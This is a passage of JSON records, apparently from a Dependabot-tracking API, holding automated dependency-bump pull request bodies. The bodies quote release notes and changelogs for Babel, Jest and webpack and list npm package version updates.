href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-runtime\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/preset-env` from 7.29.5 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/preset-env's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-preset-env\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel-jest` from 30.3.0 to 30.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/releases\"\u003ebabel-jest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev30.4.1\u003c/h2\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\"\u003ehttps://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev30.4.0\u003c/h2\u003e\n\u003cp\u003eBig release! 😀\u003c/p\u003e\n\u003cp\u003eMain feature is a rewrite of our custom runtime in preparation for stabilisation of native support of ESM. As part of that work \u003ccode\u003erequire(esm)\u003c/code\u003e module is now supported on Node 24.9+ (still requires \u003ccode\u003e--experimental-vm-modules\u003c/code\u003e like before).\u003c/p\u003e\n\u003cp\u003eIn addition we now support fake timers for the recently released \u003ccode\u003eTemporal\u003c/code\u003e API in Node v26.\u003c/p\u003e\n\u003cp\u003eReact 19 is also supported properly in \u003ccode\u003epretty-format\u003c/code\u003e, meaning snapshots of React components now work like they should.\u003c/p\u003e\n\u003cp\u003eDue to all the changes, there might be regressions that snuck in. Please report them!\u003c/p\u003e\n\u003cp\u003eFull list of changes below\u003c/p\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode\u003eclearMocksOnScope(scope)\u003c/code\u003e on \u003ccode\u003eModuleMocker\u003c/code\u003e for clearing every mock function exposed on a scope object (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16088\"\u003e#16088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-resolve]\u003c/code\u003e Add \u003ccode\u003ecanResolveSync()\u003c/code\u003e on \u003ccode\u003eResolver\u003c/code\u003e so callers can detect when a user-configured resolver only exports an \u003ccode\u003easync\u003c/code\u003e hook (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16064\"\u003e#16064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Use synchronous \u003ccode\u003eevaluate()\u003c/code\u003e for ES modules without top-level \u003ccode\u003eawait\u003c/code\u003e on Node versions that support it (v24.9+), and prefer the synchronous transform path when a sync transformer is configured (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Support \u003ccode\u003erequire()\u003c/code\u003e of ES modules on Node v24.9+ (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16074\"\u003e#16074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Validate TC39 import attributes (\u003ccode\u003ewith { type: 'json' }\u003c/code\u003e) on ESM imports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16127\"\u003e#16127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/transform]\u003c/code\u003e Add \u003ccode\u003ecanTransformSync(filename)\u003c/code\u003e on \u003ccode\u003eScriptTransformer\u003c/code\u003e so callers can pick the sync vs async transform path (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-util]\u003c/code\u003e Add \u003ccode\u003eisError\u003c/code\u003e helper (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16076\"\u003e#16076\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[pretty-format]\u003c/code\u003e Support React 19 (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16123\"\u003e#16123\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[expect-utils]\u003c/code\u003e Fix \u003ccode\u003etoStrictEqual\u003c/code\u003e failing on \u003ccode\u003estructuredClone\u003c/code\u003e results due to cross-realm constructor mismatch (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15959\"\u003e#15959\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/expect-utils]\u003c/code\u003e Prevent \u003ccode\u003etoMatchObject\u003c/code\u003e/subset matching from throwing when encountering exotic iterables (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15952\"\u003e#15952\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[fake-timers]\u003c/code\u003e Convert \u003ccode\u003eDate\u003c/code\u003e to milliseconds before passing to \u003ccode\u003e@sinonjs/fake-timers\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16029\"\u003e#16029\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest]\u003c/code\u003e Export \u003ccode\u003eGlobalConfig\u003c/code\u003e and \u003ccode\u003eProjectConfig\u003c/code\u003e TypeScript types (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/blob/main/CHANGELOG.md\"\u003ebabel-jest's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e30.4.1\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e30.4.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode...\n\n_Description has been truncated_","html_url":"https://github.com/guardian/commercial/pull/2574","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/guardian%2Fcommercial/issues/2574","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2574/packages"}},{"old_version":"4.15.1","new_version":"5.2.4","update_type":"major","path":null,"pr_created_at":"2026-06-03T21:42:41.000Z","version_change":"4.15.1 → 5.2.4","issue":{"uuid":"4583864351","node_id":"PR_kwDOEAXZzs7ibUKp","number":21,"state":"open","title":"Bump the npm_and_yarn group across 1 directory with 22 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-03T21:42:41.000Z","updated_at":"2026-06-03T21:44:17.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":22,"packages":[{"name":"webpack","old_version":"5.88.0","new_version":"5.104.1","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-dev-server","old_version":"4.15.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"cross-spawn","old_version":"7.0.3","new_version":"7.0.6","repository_url":"https://github.com/moxystudio/node-cross-spawn"},{"name":"follow-redirects","old_version":"1.15.2","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"micromatch","old_version":"4.0.4","new_version":"4.0.8","repository_url":"https://github.com/micromatch/micromatch"},{"name":"minimatch","old_version":"3.0.4","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"nanoid","old_version":"3.3.6","new_version":"3.3.12","repository_url":"https://github.com/ai/nanoid"},{"name":"picomatch","old_version":"2.3.0","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"postcss","old_version":"8.4.24","new_version":"8.5.15","repository_url":"https://github.com/postcss/postcss"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 10 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [webpack](https://github.com/webpack/webpack) | `5.88.0` | `5.104.1` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `4.15.1` | `5.2.4` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [cross-spawn](https://github.com/moxystudio/node-cross-spawn) | `7.0.3` | `7.0.6` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.2` | `1.16.0` |\n| [micromatch](https://github.com/micromatch/micromatch) | `4.0.4` | `4.0.8` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.0.4` | `3.1.5` |\n| [nanoid](https://github.com/ai/nanoid) | `3.3.6` | `3.3.12` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.0` | `2.3.2` |\n| [postcss](https://github.com/postcss/postcss) | `8.4.24` | `8.5.15` |\n\n\nUpdates `webpack` from 5.88.0 to 5.104.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.104.1\u003c/h2\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.104.0\u003c/h2\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.103.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eDotenvPlugin\u003c/code\u003e and top level \u003ccode\u003edotenv\u003c/code\u003e option to enable this plugin\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eWebpackManifestPlugin\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdded support the \u003ccode\u003eignoreList\u003c/code\u003e option in devtool plugins\u003c/li\u003e\n\u003cli\u003eAllow to use custom javascript parse function\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve 